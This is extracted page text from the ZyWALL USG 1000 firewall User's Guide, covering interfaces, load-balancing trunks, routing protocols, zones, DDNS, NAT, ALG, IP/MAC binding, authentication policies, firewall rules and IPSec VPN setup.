Page 332: ...t with a destination address of 5 5 5 5 it might not find any entries in the routing table In this case the packet is dropped However if there is a default router to which the ZyWALL should send this packet you can specify it as a gateway in one of the interfaces For example if there is a default router at 200 200 200 100 you can create a gateway at 200 200 200 100 on ge2 In this case the ZyWALL c...

Page 333: ...ddresses subnet masks gateways and some network information such as the IP addresses of DNS servers on computers in the network This reduces the amount of manual configuration you have to do and usually uses available IP addresses more efficiently In DHCP every network has at least one DHCP server When a computer a DHCP client joins the network it submits a DHCP request The DHCP servers get the re...

Page 334: ...ace provides the same gateway you specify for the interface See IP Address Assignment on page 331 DNS servers The interface provides IP addresses for up to three DNS servers that provide DNS services for DHCP clients You can specify each IP address manually for example a company s own DNS server or you can refer to DNS servers that other interfaces received from DHCP servers for example a DNS serv...

Page 335: ...g systems including RADIUS You can access one of several network services This makes it easier for the service provider to offer the service PPPoE does not usually require any special configuration of the modem PPTP is used to set up virtual private networks VPN in unsecure TCP IP environments It sets up two sessions 1 The first one runs on TCP port 1723 It is used to start and manage the second o...

Page 336: ...Chapter 13 Interfaces ZyWALL USG 1000 User s Guide 336 ...

Page 337: ...ia You could use policy routes and trunks to have traffic for your European branch office primarily use ISP A and traffic for your Australian branch office primarily use ISP B Or maybe one of the ZyWALL s interfaces is connected to an ISP that is also your Voice over IP VoIP service provider You can use policy routing to send the VoIP traffic through a trunk with the interface connected to the VoI...

Page 338: ...pes through the best WAN interface for that type of traffic If that interface s connection goes down the ZyWALL can still send its traffic through another interface You can define multiple trunks for the same physical interfaces Link Sticking You can have the ZyWALL send each local computer s traffic that is going to the same destination through a single WAN interface for a specified period of tim...

Page 339: ...ed bandwidth refers to the bandwidth an interface is currently using Least Load First The least load first algorithm uses the current or recent outbound bandwidth utilization of each trunk member interface as the load balancing index es when making decisions about to which interface a new session is to be distributed The outbound bandwidth utilization is defined as the measured outbound throughput...

Page 340: ...distribute the network traffic between the two interfaces by setting the weight of ge2 and ge3 to 2 and 1 respectively The ZyWALL assigns the traffic of two sessions to ge2 for every session s traffic assigned to ge3 Figure 262 Weighted Round Robin Algorithm Example Spillover The spillover load balancing algorithm sends network traffic to the first interface in the trunk member list until the inte...

Page 341: ...old of the first interface is set to 800K The ZyWALL sends network traffic of new sessions that exceed this limit to the secondary WAN interface Figure 263 Spillover Algorithm Example Finding Out More See Section 6 5 5 on page 103 for related information on the Trunk screens See Section 7 3 on page 122 for an example of how to configure load balancing See Section 14 4 on page 345 for more backgrou...

Page 342: ... this button to display a greater or lesser number of configuration fields Enable Link Sticking Enable link sticking to have the ZyWALL route sessions from one source to the same destination through the same link for a period of time This is useful for accessing servers that are incompatible with a user s sessions coming from different links For example this is useful when a server requires authen...

Page 343: ...dds all external interfaces into the pre configured system default SYSTEM_DEFAULT_WAN_TRUNK You cannot delete it You can create your own User Configuration trunks Add Click this to create a new user configured trunk Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove a user configured trunk select it and click Remove Th...

Page 344: ...lick Add to add a new member interface after the selected member interface Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove a member interface select it and click Remove The ZyWALL confirms you want to remove it before doing so Move To move an interface to a different number in the list click the Move icon In the fie...

Page 345: ...e traffic the ZyWALL sends through that interface Ingress Bandwidth This field displays with the least load first load balancing algorithm It displays the maximum number of kilobits of data the ZyWALL is to allow to come in through the interface per second Egress Bandwidth This field displays with the least load first or spillover load balancing algorithm It displays the maximum number of kilobits...

Page 346: ...Chapter 14 Trunks ZyWALL USG 1000 User s Guide 346 ...

Page 347: ... default gateway R1 You create one policy route to connect to services offered by your ISP behind router R2 You create another policy route to communicate with a separate network behind another router R3 connected to the LAN Figure 266 Example of Policy Routing Topology Note You can generally just use policy routes You only need to use static routes if you have a large network with multiple router...

Page 348: ... policy routes to manage other types of traffic like ICMP traffic and send traffic through VPN tunnels Note Bandwidth management in policy routes has priority over application patrol bandwidth management Cost Savings IPPR allows organizations to distribute interactive traffic on high bandwidth high cost paths while using low cost paths for batch traffic Load Sharing Network administrators can use ...

Page 349: ...ng the route based on the application types and traffic flow Packets are marked with DiffServ Code Points DSCPs indicating the level of service desired This allows the intermediary DiffServ compliant network devices to handle the packets differently depending on the code points without the need to negotiate paths or remember state information for every flow In addition applications do not have to ...

Page 350: ...red policy routes and turn policy routing based bandwidth management on or off A policy route defines the matching criteria and the action to take when a packet meets the criteria The action is taken only when all the criteria are met The criteria can include the user name source address and incoming interface destination address schedule IP protocol ICMP UDP TCP etc and port The actions that can ...

Page 351: ...dit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Move To change a rule s position in the numbered list s...

Page 352: ...SCP value of the outgoing packets that match this route If this field displays a DSCP value the ZyWALL applies that DSCP value to the route s outgoing packets preserve means the ZyWALL does not modify the DSCP value of the route s outgoing packets default means the ZyWALL sets the DSCP value of the route s outgoing packets to 0 The af choices stand for Assured Forwarding The number following the a...

Page 353: ...onfiguration Network Routing Policy Route Add The following table describes the labels in this screen Table 84 Configuration Network Routing Policy Route Edit LABEL DESCRIPTION Create new Object Use this to configure any new settings objects that you need to use in this screen Configuration Enable Select this to activate the policy Description Enter a descriptive name of up to 31 printable ASCII c...

Page 354: ...ne of three drop preferences See Assured Forwarding AF PHB for DiffServ on page 359 for more details User Defined DSCP Code Use this field to specify a custom DSCP code point Schedule Select a schedule to control when the policy route is active none means the route is active at all times if enabled Service Select a service or service group to identify the type of traffic to which this policy route...

Page 355: ...gh the specified interface Auto Disable This field displays when you select Interface or Trunk in the Type field Select this to have the ZyWALL automatically disable this policy route when the next hop s connection is down DSCP Marking DSCP Marking Set how the ZyWALL handles the DSCP value of the outgoing packets that match this route Select one of the pre defined DSCP values to apply or select Us...

Page 356: ...before using a port triggering rule Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Select an entry and click this to be able to modify it You can also just double click an entry to be able to modify it Remove Select an entry and click this to delete it Move The ordering of your rules is important as they are applied in order o...

Page 357: ...andwidth unbudgeted and do not enable Maximize Bandwidth Usage Bandwidth Priority Enter a number between 1 and 7 to set the priority for traffic The smaller the number the higher the priority If you set the maximum bandwidth to 0 the bandwidth priority will be changed to 0 after you click OK That means the route has the highest priority and will get all the bandwidth it needs up to the maximum ava...

Page 358: ... to remove it before doing so This is the number of an individual static route Destination This is the destination IP address Subnet Mask This is the IP subnet mask Next Hop This is the IP address of the next hop gateway or the interface through which the traffic is routed The gateway is a router or switch on the same segment as your ZyWALL s interface s The gateway helps forward packets to their ...

Page 359: ...s If congestion occurs between classes the traffic in the higher class smaller numbered class is generally given priority Combining the classes and drop precedence produces the Gateway IP Select the radio button and enter the IP address of the next hop gateway The gateway is a router or switch on the same segment as your ZyWALL s interface s The gateway helps forward packets to their destinations ...

Page 360: ...computer Port triggering is used especially when the remote server responses using a different port from the port the client computer used to request a service The ZyWALL records the IP address of a client computer that sends traffic to a remote server to request a service incoming service When the ZyWALL receives a new connection trigger service from the remote server the ZyWALL forwards the traf...

Page 361: ...route is not using among the policy routes that require more bandwidth When you enable maximize bandwidth usage the ZyWALL first makes sure that each policy route gets up to its bandwidth allotment Next the ZyWALL divides up an interface s available bandwidth bandwidth that is unbudgeted or unused by the policy routes depending on how many policy routes require more bandwidth and on their priority...

Page 362: ...Chapter 15 Policy and Static Routes ZyWALL USG 1000 User s Guide 362 ...

Page 363: ...o in this Chapter Use the RIP screen see Section 16 2 on page 364 to configure the ZyWALL to use RIP to receive and or send routing information Use the OSPF screen see Section 16 3 on page 365 to configure general OSPF settings and manage OSPF areas Use the OSPF Area Add Edit screen see Section 16 3 2 on page 372 to create or edit an OSPF area 16 1 2 What You Need to Know The ZyWALL supports two s...

Page 364: ...gs before you can use it in an interface First the Authentication field specifies how to verify that the routing information that is received is the same routing information that is sent This is discussed in more detail in Authentication Types on page 375 Second the ZyWALL can also redistribute routing information from non RIP networks specifically OSPF networks and static routes to the RIP networ...

Page 365: ...nd 255 MD5 Authentication Key This field is available if the Authentication is MD5 Type the password for MD5 authentication The password can consist of alphanumeric characters and the underscore and it can be up to 16 characters long Redistribute Active OSPF Select this to use RIP to advertise routes that were learned through OSPF Metric Type the cost for routes provided by OSPF The metric represe...

Page 366: ...sents a group of adjacent networks and is identified by a 32 bit ID In OSPF this number may be expressed as an integer or as an IP address There are several types of areas The backbone is the transit area that routes packets between other areas All other areas are connected to the backbone A normal area is a group of adjacent networks A normal area has routing information about the OSPF AS any net...

Page 367: ...o confirm which neighbor layer 3 devices exist and then they exchange database descriptions DDs to create a synchronized link state database The link state database contains records of router IDs their associated links and path costs The link state database is then constantly updated through Link State Advertisements LSA Each router uses the link state database and the Dijkstra algorithm to comput...

Page 368: ...DR All of the routers only exchange information with the DR and the BDR instead of exchanging information with all of the other routers in the group The DR and BDR are selected by priority if two routers have the same priority the highest router ID is used The DR and BDR are selected in each group of routers that are directly connected to each other If a router is directly connected to several gro...

Page 369: ...the backbone You cannot create a virtual link to a router in a different area OSPF Configuration Follow these steps when you configure OSPF on the ZyWALL 1 Enable OSPF 2 Set up the OSPF areas 3 Configure the appropriate interfaces See Section 13 3 1 on page 284 4 Set up virtual links as needed 16 3 1 Configuring the OSPF Screen Use the first OSPF screen to specify the OSPF router the ZyWALL uses i...

Page 370: ...istribute Active RIP Select this to advertise routes that were learned from RIP The ZyWALL advertises routes learned from RIP to Normal and NSSA areas but not to Stub areas Type Select how OSPF calculates the cost associated with routing information from RIP Choices are Type 1 and Type 2 Type 1 cost OSPF AS cost external cost Metric Type 2 cost external cost Metric the OSPF AS cost is ignored Metr...

Page 371: ...reas in the ZyWALL Add Click this to create a new OSPF area Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so This field is a sequential value and it is not associated with a specific area Area This field displays the 32 bit ...

Page 372: ... information about the OSPF AS and about networks outside the OSPF AS Stub This area is an stub area It has routing information about the OSPF AS but not about networks outside the OSPF AS It depends on a default route to send information outside the OSPF AS NSSA This area is a Not So Stubby Area NSSA per RFC 1587 It has routing information about the OSPF AS and networks that are outside the OSPF ...

Page 373: ...should set up the virtual link on the ABR that is connected to the other area and on the ABR that is connected to the backbone Add Click this to create a new virtual link Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so This...

Page 374: ...entication Text uses a plain text password that is sent over the network not very secure MD5 uses an MD5 password and authentication ID most secure Same as Area has the virtual link also use the Authentication settings above Text Authentication Key This field is available if the Authentication is Text Type the password for text authentication The key can consist of alphanumeric characters and the ...

Page 375: ...ord and authentication ID MD5 is an authentication method that produces a 128 bit checksum called a message digest for each packet It also includes an authentication ID which can be set to any value between 1 and 255 The ZyWALL only accepts packets if these conditions are satisfied The packet s authentication ID is the same as the authentication ID of the interface that received it The packet s me...

Page 376: ...Chapter 16 Routing Protocols ZyWALL USG 1000 User s Guide 376 ...

Page 377: ... settings such as firewall rules Anti X and remote management Zones cannot overlap Each Ethernet interface VLAN interface bridge interface PPPoE PPTP interface auxiliary interface and VPN tunnel can be assigned to at most one zone Virtual interfaces are automatically assigned to the same zone as the interface on which they run Figure 279 Example Zones 17 1 1 What You Can Do in this Chapter Use the...

Page 378: ...ple DMZ to DMZ but many other types of zone based security and policy settings do not affect intra zone traffic Inter zone Traffic Inter zone traffic is traffic between interfaces or VPN tunnels in different zones For example in Figure 279 on page 377 traffic between VLAN 1 and the Internet is inter zone traffic This is the normal case when zone based security and policy settings apply Extra zone ...

Page 379: ...his to create a new user configured zone Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove a user configured trunk select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry ...

Page 380: ...ters underscores _ or dashes but the first character cannot be a number This value is case sensitive Block Intra zone Traffic Select this check box to block network traffic between members in the zone Member List Available lists the interfaces and VPN tunnels that do not belong to any zone Select the interfaces and VPN tunnels that you want to add to the zone you are editing and click the right ar...

Page 381: ...the domain name to contact you in NetMeeting CU SeeMe etc or to access your FTP server or Web site regardless of the current IP address Note You must have a public WAN IP address to use Dynamic DNS You must set up a dynamic DNS account with a supported DNS service provider before you can use Dynamic DNS services with the ZyWALL When registration is complete the DNS service provider gives you a pas...

Page 382: ...n Figure 282 Configuration Network DDNS The following table describes the labels in this screen Table 97 Configuration Network DDNS LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it befo...

Page 383: ...ternate interface to use for updating the IP address mapped to the domain name followed by how the ZyWALL determines the IP address for the domain name The ZyWALL uses the backup interface and IP address when the primary interface is disabled its link is down or its connectivity check fails from interface The IP address comes from the specified interface auto detected The DDNS server checks the so...

Page 384: ...Table 98 Configuration Network DDNS Add LABEL DESCRIPTION Show Advance Settings Hide Advance Settings Click this button to display a greater or lesser number of configuration fields Enable DDNS Profile Select this check box to use this DDNS entry Profile Name When you are adding a DDNS entry type a descriptive name for this DDNS entry in the ZyWALL You may use 1 31 alphanumeric characters undersco...

Page 385: ...face The ZyWALL uses the IP address of the specified interface This option appears when you select a specific interface in the Primary Binding Address Interface field Auto If the interface has a dynamic IP address the DDNS server checks the source IP address of the packets from the ZyWALL for the IP address to use for the domain name You may want to use this if there are one or more NAT routers be...

Page 386: ... feature to alias subdomains to be aliased to the same IP address as your dynamic domain name This feature is useful if you want to be able to use for example www yourhost dyndns org and still reach your hostname Mail Exchanger This option is only available with a DynDNS account DynDNS can route e mail for your domain name to a mail server called a mail exchanger For example DynDNS routes e mail f...

Page 387: ...n the private network available by using ports to forward packets to the appropriate private IP address Suppose you want to assign ports 21 25 to one FTP Telnet and SMTP server A in the example port 80 to another B in the example and assign a default server IP address of 192 168 1 35 to a third C in the example You assign the LAN IP addresses and the ISP assigns the WAN IP address The NAT network ...

Page 388: ... 12 3 on page 158 for an example of how to configure NAT to allow SIP traffic from the WAN to an IPPBX or SIP server on the DMZ 19 2 The NAT Screen The NAT summary screen provides a summary of all NAT rules and their configuration In addition this screen allows you to create new NAT rules and edit and delete existing NAT rules To access this screen login to the Web Configurator and click Configura...

Page 389: ...isplays the original destination IP address or address object of traffic that matches this NAT entry It displays any if there is no restriction on the original destination IP address Mapped IP This field displays the new destination IP address for the packet Protocol This field displays the service used by the packets for this NAT entry It displays any if there is no restriction on the services Or...

Page 390: ...figuration Network NAT Add The following table describes the labels in this screen Table 100 Configuration Network NAT Add LABEL DESCRIPTION Create new Object Use to configure any new settings objects that you need to use in this screen Enable Rule Use this option to turn the NAT rule on or off Rule Name Type in the name of the NAT rule The name is used to refer to the NAT rule You may use 1 31 al...

Page 391: ...ing interface s IP addresses including dynamic addresses or those of any virtual interfaces built upon the selected incoming interface User Defined Select this to manually enter an IP address in the User Defined field For example you could enter a static public IP assigned by the ISP without having to create a virtual interface for it Host address select a host address object to use the IP address...

Page 392: ...destination ports this NAT rule supports Original End Port This field is available if Mapping Type is Ports Enter the end of the range of original destination ports this NAT rule supports Mapped Start Port This field is available if Mapping Type is Ports Enter the beginning of the range of translated destination ports if this NAT rule forwards the packet Mapped End Port This field is available if ...

Page 393: ...fter you configure your NAT rule settings click the Firewall link to configure a firewall rule to allow the NAT rule s traffic to come in The ZyWALL checks NAT rules before it applies To ZyWALL firewall rules so To ZyWALL firewall rules do not apply to traffic that is forwarded by NAT rules The ZyWALL still checks other firewall rules according to the source IP address and mapped IP address OK Cli...

Page 394: ... 1 NAT loopback uses the IP address of the ZyWALL s LAN interface 192 168 1 1 as the source address of the traffic going from the LAN users to the LAN SMTP server Figure 288 LAN to LAN Traffic The LAN SMTP server replies to the ZyWALL s LAN IP address and the ZyWALL changes the source address to 1 1 1 1 before sending it to the LAN user The return traffic s source matches the original destination ...

Page 395: ...N user without the traffic going through NAT the source would not match the original destination address which would cause the LAN user s computer to shut down the session Figure 289 LAN to LAN Return Traffic 192 168 1 21 LAN 192 168 1 89 Source 1 1 1 1 SMTP NAT Source 192 168 1 21 SMTP ...

Page 396: ...Chapter 19 NAT ZyWALL USG 1000 User s Guide 396 ...

Page 397: ...nt connected to the LAN zone wants to open a web page its HTTP request is redirected to proxy server A first If proxy server A cannot find the web page in its cache a policy route allows it to access the Internet to get them from a server Proxy server A then forwards the response to the client Figure 290 HTTP Redirect Example 20 1 1 What You Can Do in this Chapter Use the HTTP Redirect screens see...

Page 398: ...s 1 Firewall 2 Application Patrol 3 HTTP Redirect 4 Policy Route Even if you set a policy route to the same incoming interface and service as a HTTP redirect rule the ZyWALL checks the HTTP redirect rules first and forwards HTTP traffic to a proxy server if matched You need to make sure there is no firewall rule s blocking the HTTP requests from the client to the proxy server You also need to manu...

Page 399: ...table describes the labels in this screen Table 101 Configuration Network HTTP Redirect LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Activate To turn on an entry sel...

Page 400: ...ed settings Table 101 Configuration Network HTTP Redirect continued LABEL DESCRIPTION Table 102 Network HTTP Redirect Edit LABEL DESCRIPTION Enable Use this option to turn the HTTP redirect rule on or off Name Enter a name to identify this rule You may use 1 31 alphanumeric characters underscores _ or dashes but the first character cannot be a number This value is case sensitive Interface Select t...

Page 401: ...Chapter 20 HTTP Redirect ZyWALL USG 1000 User s Guide 401 ...

Page 402: ...Chapter 20 HTTP Redirect ZyWALL USG 1000 User s Guide 402 ...

Page 403: ...er Internet H 323 A teleconferencing protocol suite that provides audio data and video conferencing FTP File Transfer Protocol an Internet file transfer service The following example shows SIP signaling 1 and audio 2 sessions between SIP clients A and B and the SIP server Figure 293 SIP ALG Example The ALG feature is only needed for traffic that goes through the ZyWALL s NAT 21 1 1 What You Can Do...

Page 404: ...erver from the WAN H 323 ALG The H 323 ALG supports peer to peer H 323 calls The H 323 ALG handles H 323 calls that go through NAT or that the ZyWALL routes You can also make other H 323 calls that do not go through NAT or routing Examples would be calls between LAN IP addresses that are on the same subnet The H 323 ALG allows calls to go out through NAT For example you could make a call from a pr...

Page 405: ...es the application patrol see Chapter 32 on page 527 to use the same port numbers for SIP traffic Likewise configuring the application patrol to use custom port numbers for SIP traffic also configures SIP ALG to use the same port numbers for SIP traffic Peer to Peer Calls and the ZyWALL The ZyWALL ALG can allow peer to peer VoIP calls for both H 323 and SIP You must configure the firewall and NAT ...

Page 406: ...return traffic for the calls initiated from the LAN IP addresses For example you configure firewall and NAT rules to allow LAN IP address A to receive calls through public WAN IP address 1 You configure different firewall and port forwarding rules to allow LAN IP address B to receive calls through public WAN IP address 2 You configure corresponding policy routes to have calls from LAN IP address A...

Page 407: ... to allow sessions initiated from the WAN 21 2 The ALG Screen Click Configuration Network ALG to open the ALG screen Use this screen to turn ALGs off or on configure the port numbers to which they apply and configure SIP ALG time outs Note If the ZyWALL provides an ALG for a service you must enable the ALG in order to use the application patrol on that service s traffic Figure 297 Configuration Ne...

Page 408: ...out Most SIP clients have an expire mechanism indicating the lifetime of signaling sessions The SIP user agent sends registration packets to the SIP server periodically and keeps the session alive in the ZyWALL If the SIP client does not have this mechanism and makes no calls during the ZyWALL SIP timeout the ZyWALL deletes the signaling session after the timeout period Enter the SIP signaling ses...

Page 409: ... could also have a trunk with one interface set to active and a second interface set to passive The ZyWALL does not automatically change ALG managed Enable FTP ALG Turn on the FTP ALG to detect FTP File Transfer Program traffic and help build FTP sessions through the ZyWALL s NAT Enabling the FTP ALG also allows you to use the application patrol to detect FTP traffic and manage the FTP traffic s b...

Page 410: ...ard teleconferencing protocol suite that provides audio data and video conferencing It allows for real time point to point and multipoint communication between client computers over a packet based network that does not provide a guaranteed quality of service NetMeeting uses H 323 SIP The Session Initiation Protocol SIP is an application layer control signaling protocol that handles the setting up ...

Page 411: ...WALL Suppose you configure access privileges for IP address 192 168 1 27 and use static DHCP to assign it to Tim s computer s MAC address of 12 34 56 78 90 AB IP MAC binding drops traffic from any computer trying to use IP address 192 168 1 27 with another MAC address Figure 298 IP MAC Binding Example 22 1 1 What You Can Do in this Chapter Use the Summary and Edit screens Section 22 2 on page 412 ...

Page 412: ...twork IP MAC Binding to open the IP MAC Binding Summary screen This screen lists the total number of IP to MAC address bindings for devices connected to each supported interface Figure 299 Configuration Network IP MAC Binding Summary The following table describes the labels in this screen Table 104 Configuration Network IP MAC Binding Summary LABEL DESCRIPTION Edit Double click an entry or select ...

Page 413: ... s total number of IP MAC bindings and IP addresses that the interface has assigned by DHCP Apply Click Apply to save your changes back to the ZyWALL Table 104 Configuration Network IP MAC Binding Summary continued LABEL DESCRIPTION Table 105 Configuration Network IP MAC Binding Edit LABEL DESCRIPTION IP MAC Binding Settings Interface Name This field displays the name of the interface within the Z...

Page 414: ...omputer s MAC address is in the table the ZyWALL assigns the corresponding IP address You can also access this table from the interface s edit screen Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it befo...

Page 415: ...is to assign to a device with the entry s MAC address MAC Address Enter the MAC address of the device to which the ZyWALL assigns the entry s IP address Description Enter up to 64 printable ASCII characters to help identify the entry For example you may want to list the computer s owner OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving Table...

Page 416: ...yWALL does not apply IP MAC binding Add icon Click the Add icon to add a new entry Click the Remove icon to delete an entry A window displays asking you to confirm that you want to delete it Apply Click Apply to save your changes back to the ZyWALL Table 107 Configuration Network IP MAC Binding Exempt List continued LABEL DESCRIPTION ...

Page 417: ...System OS option and security requirements to gain access See Chapter 49 on page 783 for how to configure endpoint security objects to use with authentication policies In the following figure the ZyWALL s authentication policy requires endpoint security checking on local user A A passes authentication and the endpoint security check and is given access Local user B passes authentication but fails ...

Page 418: ...atch one of the authentication policy s endpoint security objects in order to gain access Forced User Authentication Instead of making users for which user aware policies have been configured go to the ZyWALL Login screen manually you can configure the ZyWALL to display the Login screen automatically whenever it routes HTTP traffic for anyone who has not logged in yet Note This works with HTTP tra...

Page 419: ...ick Remove to delete it or them Authentication Policy Summary Use this table to manage the ZyWALL s list of authentication policies Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and ...

Page 420: ...the source address object to which this policy applies Destination This displays the destination address object to which this policy applies Schedule This field displays the schedule object that dictates when the policy applies none means the policy is active at all times if enabled Authentication This field displays the authentication requirement for users when their traffic matches this policy T...

Page 421: ...ve from the member list and click the left arrow button to remove them Figure 305 Configuration Auth Policy Add Exceptional Service 23 2 2 Creating Editing an Authentication Policy Click Configuration Auth Policy and then the Add or Edit icon to open the Endpoint Security Edit screen Use this screen to configure an authentication policy ...

Page 422: ...f up to 60 printable ASCII characters for the policy Spaces are allowed This field is available for user configured policies User Authentication Policy Use this section of the screen to determine which traffic requires or does not require the senders to be authenticated in order to be routed Source Address Select a source address or address group for whom this policy applies Select any if the poli...

Page 423: ...ation Enable EPS Checking Select this to have the ZyWALL check that users computers meet the Operating System OS and security requirements of one of the policy s selected endpoint security objects before granting access Periodical checking time Select this and specify a number of minutes to have the ZyWALL repeat the endpoint security check at a regular interval Available EPS Object Selected EPS O...

Page 424: ...Chapter 23 Authentication Policy ZyWALL USG 1000 User s Guide 424 ...

Page 425: ...on from within the LAN zone and responses to this request are allowed However other Telnet traffic initiated from the WAN or DMZ zone and destined for the LAN zone is blocked Communications between the WAN and the DMZ zones are allowed The firewall allows VPN traffic between any of the networks Figure 307 Default Firewall Action 24 1 1 What You Can Do in this Chapter Use the Firewall screens Secti...

Page 426: ... only LAN WAN computers to access or manage the ZyWALL The ZyWALL drops most packets from the WAN zone to the ZyWALL itself except for VRRP traffic for Device HA and ESP AH IKE NATT HTTPS services for VPN tunnels and generates a log Table 110 Default Firewall Behavior FROM ZONE TO ZONE BEHAVIOR From WAN to ZyWALL Traffic from the WAN to the ZyWALL itself is allowed for certain default services des...

Page 427: ...user name user s login name on the ZyWALL source IP address destination IP address and IP protocol type of network traffic against the firewall rules in the order you list them When the traffic matches a rule the ZyWALL takes the action specified in the rule User Specific Firewall Rules You can specify users or user groups in firewall rules For example to allow a specific user from any computer to...

Page 428: ...ons a client can use Finding Out More See Section 6 5 14 on page 107 for related information on the Firewall screens See Section 7 6 6 on page 139 for an example of creating firewall rules as part of configuring user aware access control Section 7 6 on page 131 See Section 7 10 3 on page 151 for an example of creating a firewall rule to allow H 323 traffic from the WAN to the LAN See Section 7 11 ...

Page 429: ... rules Any traffic that does not match the first firewall rule will match the second rule and the ZyWALL forwards it Now suppose that your company wants to let the CEO use IRC You can configure a LAN to WAN firewall rule that allows IRC traffic from the IP address of the CEO s computer You can also configure a LAN to WAN rule that allows IRC traffic from any computer through which the CEO logs int...

Page 430: ...rvice on the WAN The second row blocks LAN access to the IRC service on the WAN The third row is the firewall s default policy of allowing all traffic from the LAN to go to the WAN Alternatively you configure a LAN to WAN rule with the CEO s user name say CEO to allow IRC traffic from any source IP address to go to any destination address Your firewall would have the following configuration Table ...

Page 431: ...e ZyWALL would drop it and not check any other firewall rules 24 1 4 Firewall Rule Configuration Example The following Internet firewall rule example allows Doom players from the WAN to IP addresses 192 168 1 10 through 192 168 1 15 Dest_1 on the LAN 1 Click Configuration Firewall In the summary of firewall rules click Add in the heading row to configure a new first entry Remember the sequence pri...

Page 432: ...gure 312 Firewall Example Create a Service Object 6 Select From WAN and To LAN1 7 Enter the name of the firewall rule 8 Select Dest_1 is selected for the Destination and Doom is selected as the Service Enter a description and configure the rest of the screen as follows Click OK when you are done Figure 313 Firewall Example Edit a Firewall Rule ...

Page 433: ...wever allowing asymmetrical routes may let traffic from the WAN go directly to the LAN without passing through the ZyWALL A better solution is to use virtual interfaces to put the ZyWALL and the backup gateway on separate subnets Virtual interfaces allow you to partition your network into logical sections over the same interface See the chapter about interfaces for more information By putting LAN ...

Page 434: ...to the selected direction Note the following If you enable intra zone traffic blocking see the chapter about zones the firewall automatically creates implicit rules to deny packet passage between the interfaces in the specified zone Besides configuring the firewall you also need to configure NAT rules to allow computers on the WAN to access LAN devices See Chapter 19 on page 387 for more informati...

Page 435: ... If an alternate gateway on the LAN has an IP address in the same subnet as the ZyWALL s LAN IP address return traffic may not go through the ZyWALL This is called an asymmetrical or triangle route This causes the ZyWALL to reset the connection as the connection has not been acknowledged Select this check box to have the ZyWALL permit the use of asymmetrical route topology on the network not reset...

Page 436: ...nactivate Move To change a rule s position in the numbered list select the rule and click Move to display a field to type a number for where you want to put that rule and press ENTER to move the rule to the number that you typed The ordering of your rules is important as they are applied in order of their numbering The following read only fields summarize the rules you have created that apply to t...

Page 437: ...he passage of packets allow Log This field shows you whether a log and alert is created when packets match this rule or not Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 114 Configuration Firewall continued LABEL DESCRIPTION Table 115 Configuration Firewall Add LABEL DESCRIPTION Create new Object Use to configure a...

Page 438: ... address should be within the IP address range Source Select a source address or address group for whom this rule applies Select any if the policy is effective for every source Destination Select a destination address or address group for whom this rule applies Select any if the policy is effective for every destination Service Select a service or service group from the drop down list box Access U...

Page 439: ... Create rules below to apply other limits for specific users or addresses Rule Summary This table lists the rules for limiting the number of concurrent sessions hosts can have Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s setti...

Page 440: ... to which this session limit rule applies Address This is the address object to which this session limit rule applies Limit This is how many concurrent sessions this user or address is allowed to have Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 116 Configuration Firewall Session Limit continued LABEL DESCRIPTION ...

Page 441: ...address range Address Select a source address or address group for whom this rule applies Select any if the policy is effective for every source address Session Limit per Host Use this field to set a limit to the number of concurrent NAT firewall sessions this rule s users or addresses can have For this rule s users and addresses this setting overrides the Default Session per Host setting in the g...

Page 442: ...Chapter 24 Firewall ZyWALL USG 1000 User s Guide 442 ...

Page 443: ...k like the Internet IPSec is built around a number of standardized cryptographic techniques to provide confidentiality data integrity and authentication at the IP layer The following figure is an example of an IPSec VPN tunnel Figure 320 IPSec VPN Example The VPN tunnel connects the ZyWALL X and the remote peer IPSec router Y These routers then connect the local network A and remote network B 25 1...

Page 444: ...ameters the ZyWALL and the remote IPSec router will use The first phase establishes an Internet Key Exchange IKE SA between the ZyWALL and remote IPSec router The second phase uses the IKE SA to securely establish an IPSec SA through which the ZyWALL and remote IPSec router can send data between computers on the local network and remote network This is illustrated in the following figure Figure 32...

Page 445: ...e IPSec router s address but you specify the remote policy the addresses of the devices behind the remote IPSec router This ZyWALL must have a static IP address or a domain name Only the remote IPSec router can initiate the VPN tunnel Choose this to allow incoming connections from IPSec VPN clients The clients have dynamic IP addresses and are also known as dial in users You don t specify the addr...

Page 446: ...virtual Ethernet interface VLAN interface or virtual VLAN interface to specify what address the ZyWALL uses as its IP address when it establishes the IKE SA You should set up the interface first See Chapter 13 on page 277 In a VPN gateway you can enable extended authentication If the ZyWALL is in server mode you should set up the authentication method AAA server first The authentication method spe...

Page 447: ...his to have the ZyWALL automatically obtain source and destination addresses for all dynamic IPSec rules See Section 6 4 2 on page 99 for how this option affects the routing table Ignore Don t Fragment setting in packet header Select this to fragment packets larger than the MTU Maximum Transmission Unit that have the don t fragment bit in the IP header turned on When you clear this the ZyWALL drop...

